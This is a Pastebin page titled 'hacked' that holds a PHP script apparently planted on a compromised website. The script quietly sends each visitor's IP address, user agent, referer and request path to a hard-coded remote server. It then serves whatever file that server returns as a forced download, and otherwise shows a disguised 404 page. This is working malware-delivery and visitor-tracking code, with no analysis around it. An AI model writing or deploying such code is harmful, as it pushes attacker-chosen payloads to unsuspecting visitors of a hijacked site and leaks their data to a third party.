SHARE
TWEET

hacked

a guest Aug 19th, 2013 620 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. <?php
 2. error_reporting(0);
 3. ini_set("display_errors", 0);
 4.  
 5. $remote = 'http://78.138.118.126:443/45vtcgxx.php';
 6.  
 7. php_display($remote);
 8.  
 9. error_404();
 10.  
 11. function php_display($url)
 12. {    
 13.     $query = array();
 14.     $query['ip'] = getIp();
 15.     $query['time'] = date('d/M/Y:H:i:s', time());
 16.     $query['request'] = getRequest();
 17.     $query['path'] = getPath();
 18.     $query['protocol'] = getProtocol();
 19.     $query['useragent'] = getUseragent();
 20.     $query['referer'] = getReferer();
 21.    
 22.     $url = $url."?".http_build_query($query);
 23.  
 24.     $content = @file_get_contents($url);
 25.    
 26.     if(strlen($content) < 10)
 27.     {
 28.         error_404();
 29.     }
 30.    
 31.     $content = explode("\n", $content);
 32.     $filename = array_shift($content);
 33.     $content = implode("\n", $content);
 34.  
 35.     if (strstr($filename, ".html") === FALSE)
 36.     {
 37.         $type = 'application/octet-stream';
 38.         header('Content-Type:'.$type);
 39.         header('Content-Disposition: attachment; filename='.$filename);
 40.         header('Content-Length: '.  strlen($content));
 41.     }
 42.  
 43.  
 44.     echo $content;
 45.     exit();
 46. }
 47.  
 48.  
 49. function http_request($params)
 50. {
 51.     if( ! is_array($params) )
 52.     {
 53.         $params = array(
 54.             'url' => $params,
 55.             'method' => 'GET'
 56.         );
 57.     }
 58.    
 59.     if( $params['url']=='' ) return FALSE;
 60.    
 61.     if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
 62.     $params['method'] = strtoupper($params['method']);
 63.     if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
 64.    
 65.     /* Ïðèâîäèì ññûëêó â ïðàâèëüíûé âèä */
 66.     $url = parse_url($params['url']);
 67.     if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
 68.     if( ! isset($url['path']) ) $url['path'] = '/';
 69.     if( ! isset($url['host']) && isset($url['path']) )
 70.     {
 71.         if( strpos($url['path'], '/') )
 72.         {
 73.             $url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
 74.             $url['path'] = substr($url['path'], strpos($url['path'], '/'));
 75.         }
 76.         else
 77.         {
 78.             $url['host'] = $url['path'];
 79.             $url['path'] = '/';
 80.         }
 81.     }
 82.     $url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
 83.     if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
 84.    
 85.     $port = isset($params['port']) ? $params['port']
 86.             : ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
 87.    
 88.     $timeout = isset($params['timeout']) ? $params['timeout'] : 30;
 89.     if( ! isset($params['return']) ) $params['return'] = 'content';
 90.    
 91.     $scheme = $url['scheme']=='https' ? 'ssl://':'';
 92.     $fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
 93.     if( $fp )
 94.     {
 95.         /* Mozilla */
 96.         if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
 97.        
 98.         $request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
 99.         $request .= "Host: {$url['host']}\r\n";
 100.         $request .= "User-Agent: {$params['User-Agent']}"."\r\n";
 101.         if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
 102.         if( isset($params['cookie']) )
 103.         {
 104.             $cookie = "";
 105.             if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
 106.             else $cookie = $params['cookie'];
 107.             if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
 108.         }
 109.         $request .= "Connection: close\r\n";
 110.         if( $params['method']=='POST' )
 111.         {
 112.             if( isset($params['data']) && is_array($params['data']) )
 113.             {
 114.                 foreach($params['data'] AS $k => $v)
 115.                     $data .= urlencode($k).'='.urlencode($v).'&';
 116.                 if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
 117.             }
 118.             $data .= "\r\n\r\n";
 119.            
 120.             $request .= "Content-type: application/x-www-form-urlencoded\r\n";
 121.             $request .= "Content-length: ".strlen($data)."\r\n";
 122.         }
 123.         $request .= "\r\n";
 124.        
 125.         if( $params['method'] == 'POST' ) $request .= $data;
 126.        
 127.         @fwrite ($fp,$request); /* Send request */
 128.        
 129.         $res = ""; $headers = ""; $h_detected = false;
 130.         while( !@feof($fp) )
 131.         {
 132.             $res .= @fread($fp, 1024); /* ÷èòàåì êîíòåíò */
 133.    
 134.             /* Ïðîâåðêà íàëè÷èÿ çàãëîâêîâ â êîíòåíòå */
 135.             if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
 136.             {
 137.                 /* çàãîëîâêè óæå ñ÷èòàíû - êîððåêòèðóåì êîíòåíò */
 138.                 $h_detected = true;
 139.                
 140.                 $headers = substr($res, 0, strpos($res, "\r\n\r\n"));
 141.                 $res = substr($res, strpos($res, "\r\n\r\n")+4);
 142.                
 143.                 /* Headers to Array */
 144.                 if( $params['return']=='headers' || $params['return']=='array'
 145.                     || (isset($params['redirect']) && $params['redirect']==true) )
 146.                 {
 147.                     $h = explode("\r\n", $headers);
 148.                     $headers = array();
 149.                     foreach( $h as $k=>$v )
 150.                     {
 151.                         if( strpos($v, ':') )
 152.                         {
 153.                             $k = substr($v, 0, strpos($v, ':'));
 154.                             $v = trim(substr($v, strpos($v, ':')+1));
 155.                         }
 156.                         $headers[strtoupper($k)] = $v;
 157.                     }
 158.                 }
 159.                 if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
 160.                 {
 161.                     $params['url'] = $headers['LOCATION'];
 162.                     if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
 163.                     if( $params['redirect-count']<10 )
 164.                     {
 165.                         $params['redirect-count']++;
 166.                         $func = __FUNCTION__;
 167.                         return @is_object($this) ? $this->$func($params) : $func($params);
 168.                     }
 169.                 }
 170.                 if( $params['return']=='headers' ) return $headers;
 171.             }
 172.         }
 173.        
 174.         @fclose($fp);
 175.     }
 176.     else return FALSE;/* $errstr.$errno; */
 177.    
 178.     if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
 179.    
 180.     return $res;
 181. }
 182.  
 183.  
 184. function error_404()
 185. {
 186.     /*header("HTTP/1.1 404 Not Found");
 187.     exit("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\r\n"
 188.             ."<html><head><title>404 Not Found</title></head><body>\r\n"
 189.             ."<h1>Not Found</h1>\r\n"
 190.             ."<p>The requested URL was not found on this server.</p>\r\n"
 191.             ."<hr>\r\n"
 192.             ."</body></html>\r\n");*/
 193.  
 194.         $uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
 195.         $content = http_request("http://".$_SERVER['SERVER_NAME']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
 196.         $content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
 197.  
 198.         exit( $content );
 199. }
 200.  
 201. function getRequest()
 202. {
 203.     return $_SERVER['REQUEST_METHOD'];
 204. }
 205.  
 206. function getPath()
 207. {
 208.     return $_SERVER['REQUEST_URI'];
 209. }
 210.  
 211. function getProtocol()
 212. {
 213.     return $_SERVER['SERVER_PROTOCOL'];
 214. }
 215.  
 216. function getUseragent()
 217. {
 218.     return $_SERVER['HTTP_USER_AGENT'];
 219. }
 220.  
 221. function getReferer()
 222. {
 223.     $referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '-';
 224.     return $referer;    
 225. }
 226.  
 227. function getIp()
 228. {
 229.     $ip = NULL;
 230.     if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
 231.     {
 232.         $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
 233.     }
 234.     elseif(isset($_SERVER['HTTP_CLIENT_IP']))
 235.     {
 236.         $ip = $_SERVER['HTTP_CLIENT_IP'];
 237.     }
 238.     elseif(isset($_SERVER['REMOTE_ADDR']))
 239.     {
 240.         $ip = $_SERVER['REMOTE_ADDR'];
 241.     }
 242.  
 243.     if(strpos($ip, ",") !== FALSE)
 244.     {
 245.         $ips = explode(",", $ip);
 246.         $ip = trim(array_pop($ips));
 247.     }
 248.  
 249.     return $ip;
 250. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top